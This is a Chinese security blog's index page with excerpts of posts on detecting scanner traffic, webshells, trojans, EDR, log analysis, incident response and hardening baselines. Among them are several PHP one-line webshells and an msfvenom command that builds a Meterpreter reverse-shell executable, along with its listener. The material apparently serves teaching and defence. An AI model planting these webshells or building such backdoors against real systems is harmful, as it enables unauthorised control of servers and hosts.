w0dao's Blog

一、网站流量分析 重点：请求参数、UA 1.1、dirsearch通过查看ua头请求的参数 dirsearch的ua头中浏览器内核版本是86，现在版本已经是122 请求参数过于离谱，一般正常访问不会访问这些网页 1.2、sqlmap流量特征 请z求参数，sql语句比较明显，手写一般写不出来 UA头中，有sqlmap的官方网站 进一步确认 http contains "" 二、漏扫流量分析2.1、AWVS 参数 、ua、content_type中含有test、testing、wvs、acunetix_wvs_security_test 、acuntix、acuntix_wvs http.request.uri.query.parameter contains"test" http.content_type contains "test" http.request.uri.query.parameter contains"test" 2.2、Nmap 过滤显示器中，输入tcp协议 ...

一、Webshell简介1.1、什么是webshell网站的后门，可以通过webshell控制网站 1.2、webshell连接测试<?php @eval($_POST['1']);?> 连接后执行系统命令 也可以使用webshel连接工具。 二、PHP Webshell2.1、常见的php webshell eval型 <?php @eval($_POST['1']);?> 其他代码执行函数型 <?php @assert($_POST['a']);?><?php @assert($_POST['a']);?><?php $st=@create_function('',$_POST['a']);$st();?><?php @preg_replace('/.*/e',$_POST['a'],'');?><?php @pre ...

一、常见的病毒分类1.1、远控木马远程控制木马被红队广泛使用，一般是用metasploit、cobaltstrike等控制器生成的系统可执行文件，如exe，elf,apk,macho文件。一般通过两种方式传播 文件上传漏洞+ 命令执行（主动） 文件下载钓鱼+诱导执行（钓鱼） 系统执行木马文件后，会反连至黑客服务器，黑客即可控制受害者计算机或移动设备，如开启摄像头、屏幕截图、文件管理、软件安装等操作。 用kali中自带的C2软件metasploit生成远控木马文件，并让windows server 2016虚拟机执行远控木马文件 在kali中操作 1. 生成exe后门 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=这里替换成kali的eth0网卡IP地址 lport=9999 -f exe -o test.exe2. 开启监听msfconsole handler -p windows/x64/meterpreter/reverse_tcp -H 这里替换成kali的eth0网卡IP地址 -P 9999 在kal ...

一、EDR1.1、什么是EDREDR（Endpoint Detection and Response,端点检测和响应），用来指代一种端点安全防护解决方案，它记录端点上的行为，使用数据分析和基于上下文的信息检测来发现异常和恶意活动，并记录有关恶意活动的数据，使安全团队能够调查和响应事件。端点可以是员工终端PC或笔记本电脑，服务器、云系统、移动设备或互联网设备等，EDR解决方案通常提供威胁搜寻、检测、分析和响应功能。 1.2、ERR和XDR、MDR的区别 XDR(Extended Detection and Response，扩展检测和响应)是一种仍在兴起但发展迅速的技术，是一种断点威胁检测和响应的新方法。EDR关注的是端点的数据。而XDR中的“X”代表扩展，它代表任何数据源。不仅是端点还有网络，电子邮件，应用程序，云工作负载等。 MDR（托管检测和响应服务）。MDR可被理解为托管的XDR 1.3、EDR的功能 持续收集端点数据 实时分析和威胁检测 自动威胁响应 溯源深度处置 支持威胁搜寻和安全加固 1.4、openedr官网地址：https://www.openedr.com/ ...

一、windows日志 如果windows服务被入侵，往往需要检索和分析相应的安全日志 除了安全设备，系统自带的日志就是取证的关键材料，但是日志数量庞大，需要高效分析windows安全日志 1.1、windows事件日志 Windows事件日志文件实际上是以特定的数据结构的方式存储内容，其中包括有关系统，安全，应用程序的记录 每个记录事件的数据结构中包含了9个元素（可以理解成数据库中的字段）： 日期/时间 事件类型 用户 计算机 事件ID 来源 类别 描述 数据等信息 查看日志的方法：Win+R，输入 eventvwr.msc 打开事件查看器 eventvwr.msc 1.2、事件查看器 事件查看器将日志分为两大类，windows日志、应用程序日志和服务日志 windows日志中又有应用程序、安全、setup、系统和forworded event这几种事件类型 1.2.1、应用程序日志 包含由应用程序或系统程序记录的事件，主要记录程序运行方面的事件 例如数据库程序可以在应用程序日志中记录文件错误，程序开发人员可以自行决定监视哪些事件 如果某个应用程序出现崩溃情 ...

一、日志介绍 此文章不考虑日志被删除的情况 删除日志需要管理员权限，且删除日志本身也会留下日志 删除日志的操作会被日志记录设备告警 删除只能删除在受害机器上的日志，日志设备中的日志不会受影响 1.1、为什么要使用日志 可以在故障刚刚发生的时就向用户发送警告信息 可以用来决定故障的根本原因或缩小系统攻击范围 1.2、分析日志的意义 如今各式各样的漏洞层出不穷，五花八门的入侵工具更是令人眼花缭乱，稍微懂点网络知识的人都可以利用各种入侵工具进行入侵 虽然经过精心配置的服务器可以抵御大部分入侵，但伴随着新漏洞的出现，也不能保证一台服务器长时间不会被入侵，所以如何检测入侵者行动以保证服务器安全性就会显得十分重要 通过日志，可以分析出各种网络可疑行为、违规操作、敏感信息，协助定位安全事件源头和调查取证，防范和发现计算机网络犯罪活动 1.3、常见的中间件漏洞 apache tomcat IIS Weblogic JBoss Nginx 1.4、中间件日志的关键点 对访问时间进行统计，可以得到服务器在某些时间段的访问情况 对IP进行统计，可以得到用户的分布情况 对请求URL的统计，可以 ...

一、入侵排查思路1.1、账户安全用户信息文件 /etc/passwd cat /etc/passwd 解释： account:password:UID:GID:GECOS:directory:shell 用户名：密码（x代表占位符，表示该密码在/etc/shadow中）：用户ID：组：ID：用户说明：家目录：登录之后的shell root:x:0:0:root:/root:/usr/bin/zsh 用户名root，x表示密码存在，0表示用户ID，0表示组ID，root用来描述用户，/root表示用户的家目录，/usr/bin/zsh表示登录后shell的位置 /etc/passwd 是任何人都能够查看的，但是只有root用户可以更改 /usr/sbin/nologin 代表用户是无法通过远程登录界面以及ssh远程登录，也无法通过su命令进行用户切换，简而言之就是不能登录使用，使用来其他服务其他程序。 ...

一、排查思路与排查流程1.1、常见应急响应事件分类 web入侵：网页挂马、主页篡改、Webshell 系统入侵：病毒木马、勒索软件、远控后门 网络攻击：DDOS攻击、DNS劫持、ARP欺骗 1.2、排查流程 二、账号安全2.1、正常用户与黑客账号的区别 正常用户 net user 能直接看到 net user 隐藏用户是以$结尾，net user 看不到，但是在控制面板、lusrmgr.msc、用户组中能看到 lusrmgr.msc 影子用户只有注册表中能看到 2.2、windows自带账户 Administratros（管理员）：这是具有完全控制和访问权限的管理员账户。默认处于禁用状态 DefaultAccount（默认账户）：这是Windows 10中的一个预配 置账户，用于应用程序容器和系统组件的身份验证。它主要用于提供安全性和隔离性。 Guest（访客）：该账户提供了一个受限制的用户环境，允许临时用户使用计算机但不能进行敏感操作或更改系统设置。通常情况下，默认情况下此账户处于禁用状态。 WDAGUtilityAccount：这是Windows Defend ...

一、linux账号管理和认证1.1、 Linux账号口令检查awk -F: '($2==""){print$1}' /etc/shadow 执行命令，如果结果为空说明，不存在空口令账号 如果内容为空，说明存在空口令账号，对帐户设置密码 1.2、Linux口令安全策略检查检查口令复杂度以及过期时长 vim /etc/login.defs 标准 PASS_MAX_DAYS 密码最长过期天数 参考值90 PASS_MIN_DAYS 密码最小过期天数 参考值80 PASS_MIN_LEN 密码最小长度 参考值8 PASS_WARN_AGE密 码过期警告天数参考值 7 二、root远程登录限制2.1、设置sudo账号操作 新建一个用户 useradd user_01passwd user_01 设置用户sudo权限 chmod u+w /etc/sudoers && vim /etc/sudoers chmod u+w是给文件授予写的权限 chmod u-w /etc/sudoer ...

一 、安全基线和漏洞的区别1.1、相同点同属于扫描类产品，同属主动安全范畴，主动安全核心是弱点管理，弱点有两类： 漏洞：系统自身固有的安全问题，软硬件BUG 配置缺陷：也叫暴露缺陷，一般是配置方面的错误并会被攻击者利用 1.2、不同点 来源不同 ​ 漏洞：是供应商的技术问题，用户是无法控制的，与生俱来的 ​ 配置缺陷：配置是客户自身的管理问题，主要问题包括：账号、口令、授权、日志等方面内容 检查方式不同 ​ 漏洞：黑盒测试 ​ 配置缺陷：白盒测试 二、账号和认证2.1、账号检查 测试内容：检查系统登录是否需要密码 操作步骤：开机检测是否需要密码 预期结果：不能存在空密码帐户 2.2、管理缺省账号测试内容：对于管理员帐号，应使用非缺省Administrator帐户名称，即重命名管理员帐户，禁用guest（来宾）帐户。操作步骤：net localgroup administratros , 确认除Administrator之外还存在重命名管理员账户 net localgroup administrators 如果没有user_01用户 net user user_0 ...